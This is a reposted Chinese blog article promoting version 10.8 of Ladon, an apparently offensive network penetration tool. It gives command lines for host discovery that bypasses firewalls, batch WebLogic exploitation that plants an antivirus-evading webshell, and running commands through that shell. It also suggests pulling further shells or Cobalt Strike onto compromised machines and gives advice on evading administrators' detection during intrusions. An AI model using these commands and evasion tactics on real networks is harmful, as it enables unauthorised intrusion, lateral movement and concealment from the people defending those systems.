Ladon10.8一键渗透 多协议探测 可达网段、出网协议

luozhenni

​
Ladon10.8一键渗透 多协议探测 可达网段、出网协议
原文链接：Ladon10.8一键渗透 多协议探测 可达网段、出网协议
k8gege [url=]K8实验室[/url] 2023-02-18 08:08 发表于广西
简介
Ladon模块化网络渗透工具，可PowerShell模块化、可CS插件化、可内存加载，无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描等。10.8版本内置198个功能模块,外部模块18个,网络资产探测模块30个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP\T3)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息，高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等，密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别155+（Web应用、中间件、脚本类型、页面类型）等，本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

Ladon 10.8  20230218

1. Ladon 10.8  20230218
   
2. [+]AllScan  所有模块一键渗透
   
3. [+]ExpScan  多EXP自动GetShell
   
4. [+]VulScan  多POC漏洞检测
   
5. [+]InfoScan  多协议探测信息
   
6. 
   
7. [+]T3Info  T3协议探测WebLogic版本  7001 7002端口 支持URL或IP:port参数
   
8. [u]whatcms  重新添加7001 weblogic探测
   
9. [u]webscan  传入IP时探测443 80端口  回显HTTPS HTTP
   
10. [u]ms17010  只显示SMB信息 以免VulScan或AllScan太多重复信息
    
11. 
    
12. [-]bypassUAC bypassUAC2  Win10、11最新版失败 CS和911版保留
    
13. [-]bypassUAC11  移除 因.net 4.0 只保留911
    
14. 
    
15. [u]Ladon.exe默认为48 Win11默认.net 4.8

复制代码

PS：PowerShell、CobaltStrike等版本已同步更新
0x001 InfoScan 多协议探测存活主机、系统信息、可达网段、出网协议

1. ##### 196 InfoScan多个模块探测系统信息
   
2. Ladon 192.168.1.8/24 InfoScan
   
3. Ladon 192.168.1.8 InfoScan

复制代码

为了能快速扫描A段，或大量B段，几千上万个C段，甚至国家网段，默认使用ICMP协议探测存活主机(系统PING命令就用ICMP协议)，ICMP可达后再使用各种协议探测相关信息。

​

编辑

Ladon Study 一键渗透 学习模式 使用效果
无需使用者了解Ladon模块命令，点击按钮即加载对应模块扫描，非常简单，由于工具是图形化界面，主要在本地使用或授权电脑接入内网检测使用，其它情况优先内存加载，被杀或拦截再上传命令行版至目标。

​

编辑
可以看到DNS、SSH、SSL、MAC等协议探测到Kali、Forite等系统，甚至Vmware虚拟机、各种设备等Ladon均可识别，也有人说NbtScan探测存活主机不错，是十几年前不错，现在当然也不错，因为windows默认都开启。所以在有些内网，使用ping扫不到机器时，用nbtscan探测到不少机器，就会觉得还不错。但对于熟悉Ladon的人来说，Nbt只是Ladon里面的一个模块，当你使用Ladon noping NbtInfo探测机器,就知道了，如果使用InfoScan，就会使用其它协议探测，对于Linux系统、网络设备、甚至关闭NBT的机器，Ladon一样能探测，只要目标开机，使用noping可绕过防火墙。
不熟悉命令的，可勾选“点击按钮复制命令”，然后在CS或各种shell上执行

​

编辑
0x002 Ladon多协议穿墙探测、绕过防火墙探测
可能有人问Ladon默认先icmp探测，有一些主机禁ping怎么办？解决方案noping参数。如果是开启防火墙呢？解决方案也是noping。noping的意思是不ping目标主机，直接使用对应协议探测。优点是不少协议能绕过防火墙或禁ping主机，缺点就是扫A段或大量C段等速度很慢，所以使用时大家结合自己情况使用。如果只是扫几百个C段，几个B段这些都无所谓。InfoScan集厉了大量协议，不用大家一个协议一个协议的探测，非常方便。

1. ##### 196 InfoScan多个模块探测系统信息
   
2. Ladon noping 192.168.1.8/24 InfoScan
   
3. Ladon noping 192.168.1.8 InfoScan

复制代码

当你开启防火墙后，使用以上命令探测目标，哪个协议能访问到目标主机，即代表目标哪些协议可穿透防火墙出网。哪个IP、哪些机器可上哪种协议的后门或C2、可用哪些横向移动工具一目了然。
不了解的同学可参考历史绕过防火墙探测文章
利用MAC绕过防火墙探测存活主机
利用Browser协议绕过防火墙探测主机信息

0x003 WebLogic批量GetShell漏洞复现
新增T3协议探测WebLogic版本，传入IP时探测7001 7002端口 支持URL或IP:port参数,该功能在LadonGo一直存在。

1. ##### 195 T3协议探测WebLogic版本
   
2. Ladon 192.168.1.8/24 T3Info
   
3. Ladon 192.168.1.8:7001 T3Info
   
4. Ladon http://192.168.1.8:7001 T3Info
   
5. Ladon url.txt T3Info

复制代码

通过Fofa或相关搜索引擎导出url.txt，但由于数据更新不及时的原因，有些URL可能已不是weblogic或者版本信息与上面不一致，这时需要使用Ladon进行精准探测，其它APP或产品也一样，可使用WhatCMS识别，确认版本好定制POC。对于指定目标内网或外网，相关搜索引擎也不定扫描到它们的C段，这种情况下同样需要Ladon，外网访问不到的内网就更不说了，相关搜索引擎更加识别不到。

​

编辑
探测目标确实使用weblgoic后，我们可POC或EXP指定IP

​

编辑
当然也可以不探测版本，直接使用WeblogicPoc模块批量探测漏洞，公开POC随便打不要钱，非指定目标也不怕拦，本身POC就公开，拦本就正常。

1. Ladon 192.168.1.8/24 WeblogicPoc
   
2. Ladon http://192.168.1.8:7001 WeblogicPoc
   
3. Ladon url.txt WeblogicPoc

复制代码

​​

​

编辑
​
WebLogicExp一键GetShell
Ladon 192.168.1.8/24 WeblogicExp

​

编辑
默认植入的是Ladon的ua shell可过很多杀软，体积也非常小1k都不到,成功getshell后，大家再自行通过各种命令更换免杀好的其它webshell操作
连接WebShell执行命令
Ladon911 JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

​

编辑
可以看到这名幸运观众为Linux系统，我们可以wget自己的其它shell到目标，更方便操作。windows就使用powershell等命令下载或直接上CS

​

编辑
后渗透的时就不用我教了，甚至进到内网，还可以再扫一波，外网都使用，搞不好内网可能也会有weblogic，不管任何时候都要懂得举一反一，吃黄豆拉豆芽，能打外网web，内网web也一样，别忘了Ladon最初设计就是专门针对内网的。但又有人误以为只能打内网，于是我又发了各种打外网的文章。
0x004 VulScan 多POC漏洞探测
如果你不熟悉相关漏洞，同样可以使用PocScan或VulScan一键检测目标存在哪些高危漏洞。如下图，针对指定IP，加载Ladon内置的很多POC检测漏洞。如本文没有提到的Struts2Poc，当然S2漏洞我已经很久没见到了，所以几乎没更新，内置POC基本为当初GUI上的POC，区别在于Ladon可批量检测。

​

编辑

1. ##### 197 VulScan PocScan多个远程漏洞检测
   
2. Ladon 192.168.1.8/24 VulScan
   
3. Ladon 192.168.1.8 PocScan
   
4. Ladon http://192.168.1.8 PocScan
   
5. 
   
6. ##### 198 ExpScan多个漏洞利用GetShell
   
7. Ladon 192.168.1.8/24 ExpScan
   
8. Ladon 192.168.1.8 ExpScan
   
9. Ladon http://192.168.1.8 ExpScan

复制代码

多个漏洞利用GetShellLadon 192.168.1.8/24 ExpScanLadon 192.168.1.8 ExpScanLadon http://192.168.1.8 ExpScan同理ExpScan就不演示了,大家不清楚都有哪些模块，可查看Ladon Study
Ladon911版保留很多功能，但被杀得更历害，该版本建议本地实验使用
AllScan
该功能还没有完工，需要可用一个批处理实现或自写程序调用
AllScan.bat  填写各种模块命令 即可实现一键调用想要功能

1. Ladon noping 192.168.1.8/c MS17010
   
2. Ladon noping 192.168.1.8/c SmbInfo
   
3. Ladon noping 192.168.1.8/c NbtInfo
   
4. Ladon noping 192.168.1.8/c ICMP
   
5. Ladon noping 192.168.1.8/c WebLogicPoc
   
6. ...省略...
   
7. ...省略...
   
8. Ladon noping 192.168.1.8/c ICMP
   
9. Ladon noping 192.168.1.8/c Strutus2Poc
   
10. Ladon noping 192.168.1.8/c TomcatPoc
    
11. ::Brute
    
12. Ladon noping 192.168.1.8/c 401Scan
    
13. Ladon noping 192.168.1.8/c SmbScan
    
14. Ladon noping 192.168.1.8/c NbtScan

复制代码

注意
这种批量做很多事的功能，不建议在防御强度高，管理员牛B的项目使用，大家应该都有过使用AWVS扫网站时，可能直接被封IP的情况吧，因为它发了成千上万个漏洞数据包探测目标。里面只要有1个POC是杀软拦截的，它就直接失去机会。还有另外一种一个POC都检测不到，但是通过请求速度，1秒内发包量来判定是否是攻击，而封你IP。又或者爆破密码，也被封IP，这种可能是管理员看到日志或有相关设备拦截了，在外网渗透犯这种错误，换个IP就能解决。但在内网，这种无脑一上来就自动大量扫描的，一被发现，轻则当前控制机器不可达被你扫描的一些机器，重则当前机器权限丢失。因为各种日志系统均显示攻击IP来自某一台机器，大量的密码爆破，各种POC探测，WAF会有记录和提示的，有些是直接拦截自动封IP。更严重的是所有机器权限都丢失，有可能因为这种大动作，导致动员大家进行全面检查，然后所有机器权限全部丢失。如果你只拿了区区一个webshell或只控了一台机，这种入门的渗透方式就不要用了。所以这也是Ladon一直以为都不做全扫描的原因，但是想到有些目标管理员就是SB，随便搞也没事，还是加一下，对于不重要的可以节省不少时间。
但还是要明白一点，并不是所有项目的人都是SB，并不是每次的运气都那么好。当天没发现，一周内没发现，一个月没发现，不代表两个月不会发现。这种暴力方式全靠管理员SB，当然实战确实是90%都是SB。实战大家要结合自己的项目情况，可以先收集相关信息，分析下管理员能力来判定是否无脑全扫描。当然不只是说用Ladon有这风险，用其它工具也是一样，比如nmap以前我用也是从入门的全端口，到后来慢慢变成只扫一些端口。相信现在就算在使用nmap的人也很少扫全端口吧，你用nmap懂这个道理，用其它工具难道不同吗？
给大家的建议是，能用一个漏洞，能发一个包就能拿权限，就不要发几百个包，没人知道目标有什么防火墙，或者管理员什么时候看日志。同一个目标可能很多人在渗透在乱扫，管理员一眼看大量日志，你的只有几条，可能排查起来就看不到你的IP，你的存活时间就会更长一些。而不是过几天，管理员把什么协议封了，我这台机过不去了，管理员牛我们没话说，要是自己操作过程是这种很容易被发现的方法，那就不是管理员牛B了，是自己的问题。
，要